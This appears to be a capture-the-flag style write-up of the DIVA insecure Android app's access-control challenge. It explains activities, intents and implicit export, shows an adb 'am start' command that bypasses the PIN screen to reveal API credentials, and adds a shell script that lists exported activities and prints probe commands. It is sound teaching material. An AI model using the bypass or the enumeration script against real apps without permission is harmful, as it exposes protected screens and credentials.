Access Control Issues - Part 2
When we click on Access Control Issues - Part 2, we get an activity with two radio buttons, Register Now and Already Registered, and a single button: VIEW TVEETER API CREDENTIALS.
Let's select Register Now and then click View Tveeter API Credentials. It asks us to enter a PIN.
On entering a random PIN, we get a toast message: Invalid PIN. Please try again.
The logs (accessed with adb shell logcat) show that APICreds2Activity is displayed when the button is clicked.
Let's go back and select the Already Registered radio button. We can see the following:
Having a look at the logs again shows the following:
In both cases the same APICreds2Activity is invoked, so there must be some logic in the app that decides what the activity shows.
Let's decompile the app using apktool with the command apktool d jakhar.aseem.diva-1.apk. On checking the decoded AndroidManifest.xml, we see the following:
We can see that the activity jakhar.aseem.diva.APICreds2Activity is declared along with an intent-filter, and without an explicit android:exported attribute.
Before cracking the challenge, let's understand the basics:
An Activity represents a screen with a user interface. All activities must be declared in AndroidManifest.xml, which is stored as binary XML inside the apk, so you can't just open it in an editor. You have to decode the apk with a tool like apktool to get a readable version of the file.
Intents are message objects in the Android system. They allow components of one or more apps to communicate. An intent-filter on a component declares which intents it accepts, based on the intent's action, data, and category. When an activity declares an intent-filter and no android:exported attribute, it is exported by default, i.e. any other app on the device can start it, with whatever extras it likes. (This implicit export applies up to Android 11 / targetSdk 30; from Android 12 / targetSdk 31 an activity with an intent-filter must set android:exported explicitly or the app fails to install, but apps targeting older SDK levels keep the old behaviour.)
Back to the challenge.
We assumed there is some internal logic, so let's look at the source with the help of Dex2Jar and JD-GUI. Opening APICreds2Activity.class shows a check on a Boolean extra whose key is the string with resource ID 2131099686: getBooleanExtra() reads it from the incoming Intent, and if the inverse of the returned value is true, the API keys are displayed; otherwise the PIN prompt is shown.
How do we get the string from its ID?
JD-GUI gives you decompiled Java in which strings and other resources are referenced by the numeric IDs stored in R.class (the R$string inner class). Searching that file for the ID 2131099686 shows that it denotes the string resource chk_pin.
To get the value of chk_pin, open /res/values/strings.xml in the apktool output and search for that resource name.
We can use the activity manager (am) to invoke the activity ourselves with the Boolean extra set to false (--ez sets a Boolean extra; the key is the value of chk_pin, check_pin), using the command:
adb shell am start -n jakhar.aseem.diva/.APICreds2Activity -a jakhar.aseem.diva.action.VIEW_CREDS2 --ez check_pin false
Voila, we invoked the activity with the required action and extra, and it shows the API credentials without asking for a PIN.
Challenge cracked!
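The two manual steps above (read the decoded manifest for implicitly exported activities, then craft an am start for one of them) generalise to any apk. The script below is an added example and is not part of the original post or of DIVA: it scans an apktool-style AndroidManifest.xml for activities another app can start (android:exported="true", or an intent-filter with no exported="false") and emits an am start probe for each. The manifest embedded in it is constructed for the example, modelled on the DIVA entry discussed above; SafeActivity and PrivateActivity are hypothetical, and the extras (such as --ez check_pin false) are still supplied by you, since the manifest does not reveal them.

```shell
#!/bin/sh
# Added example: enumerate implicitly exported activities from a decoded
# AndroidManifest.xml and print an `am start` probe for each.
# The manifest below is CONSTRUCTED for this example (modelled on DIVA);
# SafeActivity and PrivateActivity are hypothetical.

MANIFEST=$(mktemp)
trap 'rm -f "$MANIFEST"' EXIT
cat > "$MANIFEST" <<'EOF'
<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="jakhar.aseem.diva">
  <application android:label="@string/app_name">
    <activity android:name="jakhar.aseem.diva.MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <activity android:label="@string/apic2_label" android:name="jakhar.aseem.diva.APICreds2Activity">
      <intent-filter>
        <action android:name="jakhar.aseem.diva.action.VIEW_CREDS2"/>
        <category android:name="android.intent.category.DEFAULT"/>
      </intent-filter>
    </activity>
    <activity android:name="jakhar.aseem.diva.SafeActivity" android:exported="false">
      <intent-filter>
        <action android:name="jakhar.aseem.diva.action.INTERNAL"/>
      </intent-filter>
    </activity>
    <activity android:name="jakhar.aseem.diva.PrivateActivity"/>
  </application>
</manifest>
EOF

# Print "activity action" for every activity reachable from another app:
# android:exported="true", or an <intent-filter> without exported="false"
# (the implicit-export rule that applies up to Android 11 / targetSdk 30).
# Assumes each tag sits on one line, which is how apktool writes it.
list_exported_activities() {
  awk '
    /<activity[ >]/ { inact = 1; block = "" }
    inact {
      block = block $0 "\n"
      selfclosing = ($0 ~ /<activity/ && $0 ~ /\/>[ \t]*$/)
      if ($0 ~ /<\/activity>/ || selfclosing) {
        inact = 0
        # first android:name= in the block is the activity itself
        match(block, /android:name="[^"]*"/)
        name = substr(block, RSTART + 14, RLENGTH - 15)
        exported = "default"
        if (block ~ /android:exported="true"/)  exported = "true"
        if (block ~ /android:exported="false"/) exported = "false"
        action = "-"
        if (match(block, /<action android:name="[^"]*"/))
          action = substr(block, RSTART + 22, RLENGTH - 23)
        if (exported == "true" || (exported == "default" && block ~ /<intent-filter/))
          print name, action
      }
    }' "$1"
}

# Turn each reachable activity into an am(1) invocation you can paste into
# adb.  Extras cannot be read from the manifest, so the caller passes them
# (e.g. --ez check_pin false, as found from chk_pin above).
probe_commands() {
  pkg=$1; manifest=$2; shift 2
  extras=$*
  list_exported_activities "$manifest" | while read -r name action; do
    if [ "$action" = "-" ]; then
      printf 'adb shell am start -n %s/%s%s\n' "$pkg" "$name" "${extras:+ $extras}"
    else
      printf 'adb shell am start -n %s/%s -a %s%s\n' "$pkg" "$name" "$action" "${extras:+ $extras}"
    fi
  done
}

echo "Reachable activities:"
list_exported_activities "$MANIFEST"
echo "Probes:"
probe_commands jakhar.aseem.diva "$MANIFEST" --ez check_pin false
```

On the constructed manifest this lists MainActivity (the launcher is always exported) and APICreds2Activity, skips SafeActivity (exported="false" wins over the intent-filter) and PrivateActivity (no filter, so not exported), and prints an am start line for the DIVA activity identical in effect to the command used above. Run it against the real apktool output with `list_exported_activities jakhar.aseem.diva-1/AndroidManifest.xml` to see every activity an attacker can reach from another app.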
- An Activity represents a screen with a user interface
- All activities are declared in AndroidManifest.xml
- Intents are message objects
- An intent-filter specifies the type of intents a component accepts. If an activity declares one without setting android:exported, it is exported by default and any app can start it